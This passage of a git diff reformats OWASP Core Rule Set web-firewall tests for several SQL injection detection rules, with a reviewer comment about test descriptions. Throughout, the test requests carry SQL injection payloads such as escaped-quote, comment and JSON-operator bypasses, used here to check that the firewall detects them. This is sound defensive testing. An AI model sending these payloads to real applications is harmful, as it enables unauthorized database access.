text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20
age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and
%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af87..0fc6887 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942530] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml index 97d543f..ad78ed7 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml 
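Review bot: Tests 1, 2 and 3 of 942522 keep the identical `desc: "Blocks bypass with escaped quotes"` on the new side, so a go-ftw failure report cannot tell which quote variant regressed; the only hint of what differs is the YAML comment above each `data:` line. With the titles reduced to bare `test_id: 1..3` by this migration, a distinct description per case is the cheapest way to keep reports readable, e.g. `desc: "Blocks bypass with escaped single quote"`, `desc: "Blocks bypass with escaped double quote"` and `desc: "Blocks bypass with escaped backtick"`. The 942530 hunk ending on the same line raises nothing.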
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml 
@@ -2,135 +2,134 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. 
+ ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [942540] + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0..f6691e6 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml 
@@ -2,672 +2,671 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 
80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
